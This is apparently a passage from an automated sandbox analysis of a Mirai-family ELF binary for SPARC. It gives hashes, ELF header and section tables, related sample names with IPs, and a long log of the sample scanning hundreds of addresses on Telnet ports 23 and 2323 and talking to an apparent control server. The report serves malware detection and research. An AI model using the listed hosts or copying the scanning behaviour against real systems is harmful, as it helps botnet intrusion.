                        skid.arm.elfGet hashmaliciousMoobotBrowse
                        • 2.121.142.209
                        bWZQRQVOya.elfGet hashmaliciousMirai, MoobotBrowse
                        • 151.226.129.60
                        3wFmxdcDp3.elfGet hashmaliciousMiraiBrowse
                        • 94.194.151.190
                        sora.arm.elfGet hashmaliciousMiraiBrowse
                        • 2.222.21.135
                        x86.elfGet hashmaliciousMiraiBrowse
                        • 5.64.226.224
                        arm7.elfGet hashmaliciousMiraiBrowse
                        • 5.66.14.131
                        ehzGeYz3RM.elfGet hashmaliciousMiraiBrowse
                        • 94.11.75.146
                        7Ueun89KE3.elfGet hashmaliciousMiraiBrowse
                        • 94.11.75.148
                        BpSsm2RxvM.elfGet hashmaliciousMiraiBrowse
                        • 94.13.20.64
                        yWVLQIrdCC.elfGet hashmaliciousMiraiBrowse
                        • 176.249.109.141
                        qJY7qgxKYq.elfGet hashmaliciousMiraiBrowse
                        • 94.11.230.146
                        WzpinhzvZl.elfGet hashmaliciousMiraiBrowse
                        • 94.193.8.105
                        7vbrDg2AF5.elfGet hashmaliciousMiraiBrowse
                        • 94.6.4.174
                        No context
                        No context
                        No created / dropped files found
                        File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                        Entropy (8bit):6.101360975703943
                        TrID:
                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                        File name:gJxUBR0ghC.elf
                        File size:120'600 bytes
                        MD5:0e31e21ca91e71319a6ea3f001152463
                        SHA1:7d1a04607d6f5c2224e15bbcdb36701aa2249fc3
                        SHA256:cd84c1a2b08b147d9e51fadddc3240342a0c49369fbb9305e31c2566966fb35e
                        SHA512:e8274715888f886153a29dfadbfe62a24660f7603adcd185aeb1f49576c1f41fe16bad6205feedb3fd39f02cb7993a9af63d67c4622f9fd94741934ddff7eec0
                        SSDEEP:1536:Rh0S6iKawmAszgUfUiGR/BoQHY5jVP7YDFU5tgN0T59jArSKoQAMctijZEN:fBGZu25jHYVVP7YDi40NxArFoKiN
                        TLSH:78C33825BD391E27C0D4617E02B78B22F2F6624E11B8866D3E750F8AFF54A9071177B2
                        File Content Preview:.ELF...........................4.........4. ...(.......................................................t..),........dt.Q................................@..(....@.g{................#.....aH..`.....!.....!...@.....".........`......$!...!...@...........`....

                        ELF header

                        Class:ELF32
                        Data:2's complement, big endian
                        Version:1 (current)
                        Machine:Sparc
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:UNIX - System V
                        ABI Version:0
                        Entry Point Address:0x101a4
                        Flags:0x0
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:3
                        Section Header Offset:120200
                        Section Header Size:40
                        Number of Section Headers:10
                        Header String Table Index:9
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .initPROGBITS0x100940x940x1c0x00x6AX004
                        .textPROGBITS0x100b00xb00x19e240x00x6AX004
                        .finiPROGBITS0x29ed40x19ed40x140x00x6AX004
                        .rodataPROGBITS0x29ee80x19ee80x32e80x00x2A008
                        .ctorsPROGBITS0x3d1d40x1d1d40x80x00x3WA004
                        .dtorsPROGBITS0x3d1dc0x1d1dc0x80x00x3WA004
                        .dataPROGBITS0x3d1e80x1d1e80x3600x00x3WA008
                        .bssNOBITS0x3d5480x1d5480x25b80x00x3WA008
                        .shstrtabSTRTAB0x00x1d5480x3e0x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        LOAD0x00x100000x100000x1d1d00x1d1d06.12120x5R E0x10000.init .text .fini .rodata
                        LOAD0x1d1d40x3d1d40x3d1d40x3740x292c2.69200x6RW 0x10000.ctors .dtors .data .bss
                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 2, 2023 10:40:33.613147020 CET43928443192.168.2.2391.189.91.42
                        Dec 2, 2023 10:40:34.175899982 CET506682323192.168.2.23165.203.59.38
                        Dec 2, 2023 10:40:34.176112890 CET5066823192.168.2.23146.125.9.38
                        Dec 2, 2023 10:40:34.176151991 CET5066823192.168.2.23218.64.26.202
                        Dec 2, 2023 10:40:34.176194906 CET5066823192.168.2.23136.176.150.37
                        Dec 2, 2023 10:40:34.176291943 CET5066823192.168.2.2360.7.28.41
                        Dec 2, 2023 10:40:34.176310062 CET5066823192.168.2.234.114.178.4
                        Dec 2, 2023 10:40:34.176372051 CET5066823192.168.2.23126.144.16.76
                        Dec 2, 2023 10:40:34.176472902 CET506682323192.168.2.23110.173.66.44
                        Dec 2, 2023 10:40:34.176491022 CET5066823192.168.2.23113.161.251.111
                        Dec 2, 2023 10:40:34.176506042 CET5066823192.168.2.2331.249.217.56
                        Dec 2, 2023 10:40:34.176508904 CET5066823192.168.2.23219.198.25.231
                        Dec 2, 2023 10:40:34.176506996 CET5066823192.168.2.2398.4.125.59
                        Dec 2, 2023 10:40:34.176525116 CET5066823192.168.2.23152.11.21.192
                        Dec 2, 2023 10:40:34.176569939 CET5066823192.168.2.2398.70.172.164
                        Dec 2, 2023 10:40:34.176578999 CET5066823192.168.2.23193.88.59.156
                        Dec 2, 2023 10:40:34.176579952 CET5066823192.168.2.23211.159.75.93
                        Dec 2, 2023 10:40:34.176621914 CET5066823192.168.2.2313.107.147.93
                        Dec 2, 2023 10:40:34.176625013 CET5066823192.168.2.2338.114.208.45
                        Dec 2, 2023 10:40:34.176656961 CET5066823192.168.2.2391.235.114.198
                        Dec 2, 2023 10:40:34.176704884 CET5066823192.168.2.23126.20.48.14
                        Dec 2, 2023 10:40:34.176732063 CET506682323192.168.2.23159.233.26.216
                        Dec 2, 2023 10:40:34.176744938 CET5066823192.168.2.23193.254.119.28
                        Dec 2, 2023 10:40:34.176820040 CET5066823192.168.2.2312.105.7.213
                        Dec 2, 2023 10:40:34.176851988 CET5066823192.168.2.2380.208.20.158
                        Dec 2, 2023 10:40:34.176858902 CET5066823192.168.2.23163.71.157.199
                        Dec 2, 2023 10:40:34.176894903 CET5066823192.168.2.23157.215.73.46
                        Dec 2, 2023 10:40:34.177045107 CET5066823192.168.2.23198.136.202.108
                        Dec 2, 2023 10:40:34.177093029 CET5066823192.168.2.2318.121.112.142
                        Dec 2, 2023 10:40:34.177095890 CET506682323192.168.2.2368.41.123.159
                        Dec 2, 2023 10:40:34.177114964 CET5066823192.168.2.2388.239.75.115
                        Dec 2, 2023 10:40:34.177129984 CET5066823192.168.2.2391.109.103.105
                        Dec 2, 2023 10:40:34.177129984 CET5066823192.168.2.23202.227.165.150
                        Dec 2, 2023 10:40:34.177139044 CET5066823192.168.2.2334.63.251.198
                        Dec 2, 2023 10:40:34.177139044 CET5066823192.168.2.23196.87.127.136
                        Dec 2, 2023 10:40:34.177139044 CET5066823192.168.2.23126.70.132.206
                        Dec 2, 2023 10:40:34.177181005 CET5066823192.168.2.23128.4.209.102
                        Dec 2, 2023 10:40:34.177207947 CET5066823192.168.2.232.140.202.82
                        Dec 2, 2023 10:40:34.177253008 CET5066823192.168.2.23122.76.209.96
                        Dec 2, 2023 10:40:34.177257061 CET5066823192.168.2.2323.209.230.201
                        Dec 2, 2023 10:40:34.177305937 CET5066823192.168.2.23158.31.97.7
                        Dec 2, 2023 10:40:34.177309036 CET506682323192.168.2.23165.21.73.54
                        Dec 2, 2023 10:40:34.177350998 CET5066823192.168.2.2318.188.180.106
                        Dec 2, 2023 10:40:34.177354097 CET5066823192.168.2.23203.80.108.65
                        Dec 2, 2023 10:40:34.177361965 CET5066823192.168.2.2384.239.103.246
                        Dec 2, 2023 10:40:34.177397013 CET5066823192.168.2.23148.146.141.94
                        Dec 2, 2023 10:40:34.177398920 CET5066823192.168.2.23113.168.31.20
                        Dec 2, 2023 10:40:34.177406073 CET5066823192.168.2.23123.120.71.33
                        Dec 2, 2023 10:40:34.177454948 CET5066823192.168.2.23121.237.233.38
                        Dec 2, 2023 10:40:34.177486897 CET5066823192.168.2.2348.107.196.23
                        Dec 2, 2023 10:40:34.177489996 CET5066823192.168.2.2381.122.69.117
                        Dec 2, 2023 10:40:34.177495003 CET506682323192.168.2.23218.151.161.203
                        Dec 2, 2023 10:40:34.177517891 CET5066823192.168.2.2370.233.17.184
                        Dec 2, 2023 10:40:34.177522898 CET5066823192.168.2.23121.243.180.45
                        Dec 2, 2023 10:40:34.177558899 CET5066823192.168.2.23205.253.171.162
                        Dec 2, 2023 10:40:34.177562952 CET5066823192.168.2.2314.94.94.9
                        Dec 2, 2023 10:40:34.177612066 CET5066823192.168.2.23152.172.174.55
                        Dec 2, 2023 10:40:34.177669048 CET5066823192.168.2.2364.33.102.109
                        Dec 2, 2023 10:40:34.177679062 CET5066823192.168.2.2347.220.110.127
                        Dec 2, 2023 10:40:34.177691936 CET5066823192.168.2.23154.110.187.120
                        Dec 2, 2023 10:40:34.177738905 CET5066823192.168.2.23151.54.21.138
                        Dec 2, 2023 10:40:34.177740097 CET506682323192.168.2.2381.108.243.144
                        Dec 2, 2023 10:40:34.177738905 CET5066823192.168.2.2393.43.96.96
                        Dec 2, 2023 10:40:34.177758932 CET5066823192.168.2.23193.17.192.35
                        Dec 2, 2023 10:40:34.177783966 CET5066823192.168.2.2353.139.108.104
                        Dec 2, 2023 10:40:34.177786112 CET5066823192.168.2.23126.187.98.185
                        Dec 2, 2023 10:40:34.177829027 CET5066823192.168.2.23140.223.36.105
                        Dec 2, 2023 10:40:34.177850008 CET5066823192.168.2.23171.6.136.233
                        Dec 2, 2023 10:40:34.177859068 CET5066823192.168.2.2347.72.236.37
                        Dec 2, 2023 10:40:34.177861929 CET5066823192.168.2.23223.98.234.207
                        Dec 2, 2023 10:40:34.177881956 CET5066823192.168.2.23198.1.237.252
                        Dec 2, 2023 10:40:34.177881956 CET506682323192.168.2.23190.173.151.212
                        Dec 2, 2023 10:40:34.177881956 CET5066823192.168.2.23190.103.27.254
                        Dec 2, 2023 10:40:34.177942991 CET5066823192.168.2.23212.22.129.55
                        Dec 2, 2023 10:40:34.177953959 CET5066823192.168.2.23205.223.127.113
                        Dec 2, 2023 10:40:34.178006887 CET5066823192.168.2.23158.34.218.217
                        Dec 2, 2023 10:40:34.178025961 CET5066823192.168.2.2395.225.199.42
                        Dec 2, 2023 10:40:34.178028107 CET5066823192.168.2.23209.87.89.81
                        Dec 2, 2023 10:40:34.178041935 CET5066823192.168.2.2368.197.237.150
                        Dec 2, 2023 10:40:34.178056002 CET5066823192.168.2.2371.147.188.249
                        Dec 2, 2023 10:40:34.178056002 CET5066823192.168.2.23209.6.189.69
                        Dec 2, 2023 10:40:34.178064108 CET506682323192.168.2.238.181.199.100
                        Dec 2, 2023 10:40:34.178271055 CET5066823192.168.2.23185.120.221.186
                        Dec 2, 2023 10:40:34.178271055 CET5066823192.168.2.23147.106.137.21
                        Dec 2, 2023 10:40:34.178288937 CET5066823192.168.2.238.124.101.9
                        Dec 2, 2023 10:40:34.178308010 CET5066823192.168.2.23217.4.37.228
                        Dec 2, 2023 10:40:34.178308010 CET5066823192.168.2.2323.82.109.191
                        Dec 2, 2023 10:40:34.178308964 CET5066823192.168.2.23203.145.104.248
                        Dec 2, 2023 10:40:34.178369045 CET5066823192.168.2.23206.56.198.160
                        Dec 2, 2023 10:40:34.178374052 CET5066823192.168.2.23141.57.176.18
                        Dec 2, 2023 10:40:34.178375959 CET5066823192.168.2.2332.188.227.127
                        Dec 2, 2023 10:40:34.178390980 CET506682323192.168.2.23148.147.38.234
                        Dec 2, 2023 10:40:34.178455114 CET5066823192.168.2.23101.69.33.184
                        Dec 2, 2023 10:40:34.178457975 CET5066823192.168.2.23162.37.251.63
                        Dec 2, 2023 10:40:34.178462029 CET5066823192.168.2.2395.51.218.52
                        Dec 2, 2023 10:40:34.178467989 CET5066823192.168.2.23183.223.136.13
                        Dec 2, 2023 10:40:34.178487062 CET5066823192.168.2.23190.156.255.124
                        Dec 2, 2023 10:40:34.178523064 CET5066823192.168.2.2373.18.119.109
                        Dec 2, 2023 10:40:34.178523064 CET5066823192.168.2.2385.213.106.84
                        Dec 2, 2023 10:40:34.178524017 CET5066823192.168.2.23187.211.59.191
                        Dec 2, 2023 10:40:34.178553104 CET5066823192.168.2.2317.68.58.159
                        Dec 2, 2023 10:40:34.178569078 CET506682323192.168.2.2378.113.170.132
                        Dec 2, 2023 10:40:34.178576946 CET5066823192.168.2.23165.1.151.91
                        Dec 2, 2023 10:40:34.178594112 CET5066823192.168.2.23101.174.48.145
                        Dec 2, 2023 10:40:34.178613901 CET5066823192.168.2.23147.167.52.98
                        Dec 2, 2023 10:40:34.178616047 CET5066823192.168.2.23197.130.225.12
                        Dec 2, 2023 10:40:34.178633928 CET5066823192.168.2.23219.112.171.34
                        Dec 2, 2023 10:40:34.178648949 CET5066823192.168.2.23135.147.220.15
                        Dec 2, 2023 10:40:34.178653955 CET5066823192.168.2.2344.52.205.33
                        Dec 2, 2023 10:40:34.178657055 CET5066823192.168.2.23200.56.60.1
                        Dec 2, 2023 10:40:34.178694963 CET5066823192.168.2.2383.67.28.79
                        Dec 2, 2023 10:40:34.178709984 CET506682323192.168.2.23108.211.20.70
                        Dec 2, 2023 10:40:34.178715944 CET5066823192.168.2.23115.54.21.29
                        Dec 2, 2023 10:40:34.178715944 CET5066823192.168.2.23177.191.239.116
                        Dec 2, 2023 10:40:34.178731918 CET5066823192.168.2.23175.72.41.64
                        Dec 2, 2023 10:40:34.178731918 CET5066823192.168.2.23165.17.173.217
                        Dec 2, 2023 10:40:34.178750038 CET5066823192.168.2.23102.64.91.163
                        Dec 2, 2023 10:40:34.178767920 CET5066823192.168.2.23220.222.212.221
                        Dec 2, 2023 10:40:34.178781986 CET5066823192.168.2.2395.238.94.240
                        Dec 2, 2023 10:40:34.178782940 CET5066823192.168.2.2313.137.194.170
                        Dec 2, 2023 10:40:34.178795099 CET5066823192.168.2.2344.27.184.244
                        Dec 2, 2023 10:40:34.178823948 CET506682323192.168.2.2362.152.235.55
                        Dec 2, 2023 10:40:34.178863049 CET5066823192.168.2.2376.75.160.26
                        Dec 2, 2023 10:40:34.178869009 CET5066823192.168.2.23117.36.76.30
                        Dec 2, 2023 10:40:34.178883076 CET5066823192.168.2.23162.157.215.128
                        Dec 2, 2023 10:40:34.178910971 CET5066823192.168.2.23116.124.69.120
                        Dec 2, 2023 10:40:34.178916931 CET5066823192.168.2.2343.210.199.162
                        Dec 2, 2023 10:40:34.178930044 CET5066823192.168.2.23163.149.192.172
                        Dec 2, 2023 10:40:34.178942919 CET5066823192.168.2.2360.132.10.245
                        Dec 2, 2023 10:40:34.178982973 CET5066823192.168.2.23146.177.204.119
                        Dec 2, 2023 10:40:34.178983927 CET5066823192.168.2.2363.199.153.54
                        Dec 2, 2023 10:40:34.179029942 CET506682323192.168.2.23115.47.59.9
                        Dec 2, 2023 10:40:34.179054976 CET5066823192.168.2.2383.91.61.160
                        Dec 2, 2023 10:40:34.179076910 CET5066823192.168.2.2320.22.50.200
                        Dec 2, 2023 10:40:34.179199934 CET5066823192.168.2.23152.131.70.9
                        Dec 2, 2023 10:40:34.179199934 CET5066823192.168.2.23115.17.226.202
                        Dec 2, 2023 10:40:34.179243088 CET5066823192.168.2.23192.243.242.233
                        Dec 2, 2023 10:40:34.179255962 CET5066823192.168.2.2368.201.223.117
                        Dec 2, 2023 10:40:34.179260015 CET5066823192.168.2.23223.16.33.248
                        Dec 2, 2023 10:40:34.179332972 CET506682323192.168.2.23146.125.164.149
                        Dec 2, 2023 10:40:34.179336071 CET5066823192.168.2.23187.253.136.34
                        Dec 2, 2023 10:40:34.179349899 CET5066823192.168.2.23221.209.104.110
                        Dec 2, 2023 10:40:34.179351091 CET5066823192.168.2.23166.189.126.204
                        Dec 2, 2023 10:40:34.179359913 CET5066823192.168.2.2357.116.53.72
                        Dec 2, 2023 10:40:34.179359913 CET5066823192.168.2.23188.10.177.154
                        Dec 2, 2023 10:40:34.179445028 CET5066823192.168.2.23182.124.236.74
                        Dec 2, 2023 10:40:34.179445982 CET5066823192.168.2.23104.163.132.45
                        Dec 2, 2023 10:40:34.179508924 CET5066823192.168.2.2366.83.202.35
                        Dec 2, 2023 10:40:34.179521084 CET5066823192.168.2.23212.221.199.125
                        Dec 2, 2023 10:40:34.179542065 CET5066823192.168.2.2320.228.44.206
                        Dec 2, 2023 10:40:34.179558039 CET506682323192.168.2.23113.81.35.152
                        Dec 2, 2023 10:40:34.179569960 CET5066823192.168.2.2340.181.93.225
                        Dec 2, 2023 10:40:34.179573059 CET5066823192.168.2.2370.254.32.136
                        Dec 2, 2023 10:40:34.179579973 CET5066823192.168.2.23142.73.92.225
                        Dec 2, 2023 10:40:34.179614067 CET5066823192.168.2.2327.168.66.77
                        Dec 2, 2023 10:40:34.179619074 CET5066823192.168.2.2320.153.12.42
                        Dec 2, 2023 10:40:34.179673910 CET5066823192.168.2.2335.101.119.230
                        Dec 2, 2023 10:40:34.179682970 CET5066823192.168.2.2377.25.139.40
                        Dec 2, 2023 10:40:34.179702997 CET5066823192.168.2.2341.97.119.163
                        Dec 2, 2023 10:40:34.179718018 CET5066823192.168.2.23120.240.107.186
                        Dec 2, 2023 10:40:34.179884911 CET5066823192.168.2.23204.160.200.254
                        Dec 2, 2023 10:40:34.269011021 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:40:34.297199011 CET235066823.82.109.191192.168.2.23
                        Dec 2, 2023 10:40:34.309585094 CET2350668142.73.92.225192.168.2.23
                        Dec 2, 2023 10:40:34.354172945 CET2350668193.17.192.35192.168.2.23
                        Dec 2, 2023 10:40:34.426141977 CET2350668196.87.127.136192.168.2.23
                        Dec 2, 2023 10:40:34.462307930 CET235066814.94.94.9192.168.2.23
                        Dec 2, 2023 10:40:34.486838102 CET2350668115.17.226.202192.168.2.23
                        Dec 2, 2023 10:40:34.487174034 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:40:34.487449884 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:40:34.487449884 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:40:34.705841064 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:40:34.705934048 CET392222609192.168.2.235.181.156.131
                        Dec 2, 2023 10:40:34.924196005 CET2609392225.181.156.131192.168.2.23
                        Dec 2, 2023 10:40:35.181246042 CET5066823192.168.2.23161.129.89.45
                        Dec 2, 2023 10:40:35.181246042 CET506682323192.168.2.23187.72.75.7
                        Dec 2, 2023 10:40:35.181246042 CET5066823192.168.2.23187.114.255.166
                        Dec 2, 2023 10:40:35.181269884 CET5066823192.168.2.2396.171.127.181
                        Dec 2, 2023 10:40:35.181277990 CET5066823192.168.2.23209.199.160.59
                        Dec 2, 2023 10:40:35.181289911 CET5066823192.168.2.2343.235.179.201
                        Dec 2, 2023 10:40:35.181288958 CET5066823192.168.2.23218.144.231.116
                        Dec 2, 2023 10:40:35.181293964 CET5066823192.168.2.23162.119.67.199
                        Dec 2, 2023 10:40:35.181294918 CET506682323192.168.2.23206.189.246.99
                        Dec 2, 2023 10:40:35.181313038 CET5066823192.168.2.23197.45.45.223
                        Dec 2, 2023 10:40:35.181313038 CET5066823192.168.2.23194.68.24.163
                        Dec 2, 2023 10:40:35.181323051 CET5066823192.168.2.23212.254.117.192
                        Dec 2, 2023 10:40:35.181329966 CET5066823192.168.2.23182.74.231.161
                        Dec 2, 2023 10:40:35.181330919 CET5066823192.168.2.23152.66.25.173
                        Dec 2, 2023 10:40:35.181334972 CET5066823192.168.2.2398.157.19.190
                        Dec 2, 2023 10:40:35.181344032 CET5066823192.168.2.238.242.69.73
                        Dec 2, 2023 10:40:35.181344032 CET5066823192.168.2.23182.117.115.82
                        Dec 2, 2023 10:40:35.181349039 CET5066823192.168.2.23177.126.236.80
                        Dec 2, 2023 10:40:35.181349039 CET506682323192.168.2.23161.208.113.46
                        Dec 2, 2023 10:40:35.181354046 CET5066823192.168.2.2385.208.48.224
                        Dec 2, 2023 10:40:35.181354046 CET5066823192.168.2.23171.123.148.97
                        Dec 2, 2023 10:40:35.181354046 CET5066823192.168.2.23175.134.111.224
                        Dec 2, 2023 10:40:35.181396008 CET5066823192.168.2.23162.133.201.146
                        Dec 2, 2023 10:40:35.181402922 CET5066823192.168.2.23178.236.129.147
                        Dec 2, 2023 10:40:35.181407928 CET5066823192.168.2.2313.128.234.177
                        Dec 2, 2023 10:40:35.181408882 CET5066823192.168.2.2365.146.171.233
                        Dec 2, 2023 10:40:35.181418896 CET5066823192.168.2.23119.71.170.3
                        Dec 2, 2023 10:40:35.181418896 CET5066823192.168.2.2380.168.210.29
                        Dec 2, 2023 10:40:35.181435108 CET5066823192.168.2.23202.217.98.122
                        Dec 2, 2023 10:40:35.181441069 CET5066823192.168.2.23216.245.91.108
                        Dec 2, 2023 10:40:35.181447983 CET5066823192.168.2.23209.5.139.59
                        Dec 2, 2023 10:40:35.181447983 CET506682323192.168.2.23119.93.251.115
                        Dec 2, 2023 10:40:35.181448936 CET5066823192.168.2.23193.78.54.33
                        Dec 2, 2023 10:40:35.181469917 CET5066823192.168.2.2373.215.89.108
                        Dec 2, 2023 10:40:35.181472063 CET5066823192.168.2.2334.137.145.1
                        Dec 2, 2023 10:40:35.181473017 CET5066823192.168.2.2347.222.39.103
                        Dec 2, 2023 10:40:35.181479931 CET5066823192.168.2.23105.139.73.233
                        Dec 2, 2023 10:40:35.181503057 CET5066823192.168.2.2395.234.78.236
                        Dec 2, 2023 10:40:35.181503057 CET5066823192.168.2.23197.175.215.206
                        Dec 2, 2023 10:40:35.181525946 CET5066823192.168.2.23211.186.110.238
                        Dec 2, 2023 10:40:35.181526899 CET506682323192.168.2.23186.171.235.95
                        Dec 2, 2023 10:40:35.181535959 CET5066823192.168.2.2360.62.120.252
                        Dec 2, 2023 10:40:35.181571007 CET5066823192.168.2.23100.133.164.101
                        Dec 2, 2023 10:40:35.181574106 CET5066823192.168.2.23217.231.232.217
                        Dec 2, 2023 10:40:35.181585073 CET5066823192.168.2.23147.137.52.31
                        Dec 2, 2023 10:40:35.181585073 CET5066823192.168.2.23151.102.95.233
                        Dec 2, 2023 10:40:35.181608915 CET5066823192.168.2.23187.99.160.15
                        Dec 2, 2023 10:40:35.181632042 CET5066823192.168.2.2371.19.47.25
                        Dec 2, 2023 10:40:35.181643009 CET506682323192.168.2.23113.38.138.60
                        Dec 2, 2023 10:40:35.181643009 CET5066823192.168.2.2313.252.60.232
                        Dec 2, 2023 10:40:35.181648016 CET5066823192.168.2.23207.81.73.57
                        Dec 2, 2023 10:40:35.181652069 CET5066823192.168.2.2390.216.210.210
                        Dec 2, 2023 10:40:35.181664944 CET5066823192.168.2.23106.62.131.45
                        Dec 2, 2023 10:40:35.181672096 CET5066823192.168.2.23108.118.254.48
                        Dec 2, 2023 10:40:35.181674957 CET5066823192.168.2.231.112.240.82
                        Dec 2, 2023 10:40:35.181687117 CET5066823192.168.2.23125.247.100.183
                        Dec 2, 2023 10:40:35.181693077 CET5066823192.168.2.2388.154.117.117
                        Dec 2, 2023 10:40:35.181706905 CET5066823192.168.2.23126.220.227.82
                        Dec 2, 2023 10:40:35.181718111 CET5066823192.168.2.23221.111.241.223
                        Dec 2, 2023 10:40:35.181741953 CET5066823192.168.2.23159.42.105.78
                        Dec 2, 2023 10:40:35.181745052 CET506682323192.168.2.23168.25.147.220
                        Dec 2, 2023 10:40:35.181747913 CET5066823192.168.2.2393.163.244.194
                        Dec 2, 2023 10:40:35.181750059 CET5066823192.168.2.23178.189.3.241
                        Dec 2, 2023 10:40:35.181754112 CET5066823192.168.2.23103.71.178.56
                        Dec 2, 2023 10:40:35.181756973 CET5066823192.168.2.2375.141.133.172
                        Dec 2, 2023 10:40:35.181782961 CET5066823192.168.2.23152.142.106.86
                        Dec 2, 2023 10:40:35.181787014 CET5066823192.168.2.2381.94.14.26
                        Dec 2, 2023 10:40:35.181787968 CET5066823192.168.2.23174.252.154.227
                        Dec 2, 2023 10:40:35.181811094 CET5066823192.168.2.23174.245.42.124
                        Dec 2, 2023 10:40:35.181811094 CET5066823192.168.2.23103.6.198.217
                        Dec 2, 2023 10:40:35.181838989 CET506682323192.168.2.23210.0.142.218
                        Dec 2, 2023 10:40:35.181850910 CET5066823192.168.2.2320.56.221.102
                        Dec 2, 2023 10:40:35.181852102 CET5066823192.168.2.23135.205.94.19
                        Dec 2, 2023 10:40:35.181852102 CET5066823192.168.2.2341.221.11.220
                        Dec 2, 2023 10:40:35.181864023 CET5066823192.168.2.23217.10.139.43
                        Dec 2, 2023 10:40:35.181866884 CET5066823192.168.2.23148.150.66.156
                        Dec 2, 2023 10:40:35.181868076 CET5066823192.168.2.23187.142.70.178
                        Dec 2, 2023 10:40:35.181874990 CET5066823192.168.2.23113.30.22.9
                        Dec 2, 2023 10:40:35.181876898 CET506682323192.168.2.2373.212.105.119
                        Dec 2, 2023 10:40:35.181886911 CET5066823192.168.2.2382.97.114.65
                        Dec 2, 2023 10:40:35.181907892 CET5066823192.168.2.23142.4.181.115
                        Dec 2, 2023 10:40:35.181910038 CET5066823192.168.2.2395.16.70.8
                        Dec 2, 2023 10:40:35.181911945 CET5066823192.168.2.2393.108.140.0
                        Dec 2, 2023 10:40:35.181919098 CET5066823192.168.2.23101.123.241.10
                        Dec 2, 2023 10:40:35.181919098 CET5066823192.168.2.2344.192.248.107
                        Dec 2, 2023 10:40:35.181920052 CET5066823192.168.2.2390.122.28.143
                        Dec 2, 2023 10:40:35.181919098 CET5066823192.168.2.2318.25.23.70
                        Dec 2, 2023 10:40:35.181921005 CET5066823192.168.2.23101.134.6.245
                        Dec 2, 2023 10:40:35.181922913 CET5066823192.168.2.23109.51.223.135
                        Dec 2, 2023 10:40:35.181930065 CET506682323192.168.2.23205.180.168.102
                        Dec 2, 2023 10:40:35.181931973 CET5066823192.168.2.23209.246.21.234
                        Dec 2, 2023 10:40:35.181934118 CET5066823192.168.2.23136.107.81.200
                        Dec 2, 2023 10:40:35.181948900 CET5066823192.168.2.2379.2.161.183
                        Dec 2, 2023 10:40:35.181957960 CET5066823192.168.2.2369.134.84.196
                        Dec 2, 2023 10:40:35.181963921 CET5066823192.168.2.23103.177.254.187
                        Dec 2, 2023 10:40:35.181963921 CET5066823192.168.2.2372.113.48.137
                        Dec 2, 2023 10:40:35.181991100 CET5066823192.168.2.2380.109.152.52
                        Dec 2, 2023 10:40:35.181993961 CET5066823192.168.2.23169.135.84.98
                        Dec 2, 2023 10:40:35.182090998 CET5066823192.168.2.238.10.155.114
                        Dec 2, 2023 10:40:35.182097912 CET5066823192.168.2.23208.192.162.43
                        Dec 2, 2023 10:40:35.182099104 CET506682323192.168.2.23105.87.48.186
                        Dec 2, 2023 10:40:35.182101965 CET5066823192.168.2.23180.201.3.21
                        Dec 2, 2023 10:40:35.182106018 CET5066823192.168.2.23179.226.213.54
                        Dec 2, 2023 10:40:35.182106018 CET5066823192.168.2.23170.247.211.250
                        Dec 2, 2023 10:40:35.182138920 CET5066823192.168.2.23154.39.246.0
                        Dec 2, 2023 10:40:35.182142973 CET5066823192.168.2.2312.187.132.35
                        Dec 2, 2023 10:40:35.182143927 CET5066823192.168.2.23147.57.242.59
                        Dec 2, 2023 10:40:35.182147026 CET5066823192.168.2.23126.198.117.236
                        Dec 2, 2023 10:40:35.182187080 CET506682323192.168.2.23202.21.16.237
                        Dec 2, 2023 10:40:35.182199001 CET5066823192.168.2.23163.89.76.10
                        Dec 2, 2023 10:40:35.182199001 CET5066823192.168.2.2396.202.225.12
                        Dec 2, 2023 10:40:35.182207108 CET5066823192.168.2.23206.44.165.79
                        Dec 2, 2023 10:40:35.182207108 CET5066823192.168.2.23221.209.254.208
                        Dec 2, 2023 10:40:35.182210922 CET5066823192.168.2.2366.12.180.36
                        Dec 2, 2023 10:40:35.182210922 CET5066823192.168.2.23208.223.7.181
                        Dec 2, 2023 10:40:35.182226896 CET5066823192.168.2.2365.86.15.218
                        Dec 2, 2023 10:40:35.182281971 CET5066823192.168.2.23111.65.145.67
                        Dec 2, 2023 10:40:35.182281971 CET5066823192.168.2.23165.145.48.2
                        Dec 2, 2023 10:40:35.182281971 CET5066823192.168.2.2337.244.247.160
                        Dec 2, 2023 10:40:35.182287931 CET506682323192.168.2.23117.27.171.196
                        Dec 2, 2023 10:40:35.182296991 CET5066823192.168.2.23222.160.36.139
                        Dec 2, 2023 10:40:35.182305098 CET5066823192.168.2.23221.230.110.203
                        Dec 2, 2023 10:40:35.182306051 CET5066823192.168.2.2367.52.125.101
                        Dec 2, 2023 10:40:35.182306051 CET5066823192.168.2.2313.197.178.216
                        Dec 2, 2023 10:40:35.182338953 CET5066823192.168.2.23160.229.34.49
                        Dec 2, 2023 10:40:35.182339907 CET5066823192.168.2.2398.129.216.226
                        Dec 2, 2023 10:40:35.182353973 CET5066823192.168.2.23149.92.4.12
                        Dec 2, 2023 10:40:35.182359934 CET5066823192.168.2.23183.64.142.128
                        Dec 2, 2023 10:40:35.182362080 CET506682323192.168.2.23141.132.250.138
                        Dec 2, 2023 10:40:35.182395935 CET5066823192.168.2.23188.143.125.181
                        Dec 2, 2023 10:40:35.182398081 CET5066823192.168.2.23141.255.66.52
                        Dec 2, 2023 10:40:35.182399035 CET5066823192.168.2.23181.6.217.35
                        Dec 2, 2023 10:40:35.182398081 CET5066823192.168.2.2368.0.84.20
                        Dec 2, 2023 10:40:35.182399988 CET5066823192.168.2.2390.149.53.194
                        Dec 2, 2023 10:40:35.182400942 CET5066823192.168.2.2386.120.146.252
                        Dec 2, 2023 10:40:35.182399988 CET5066823192.168.2.2385.109.30.42
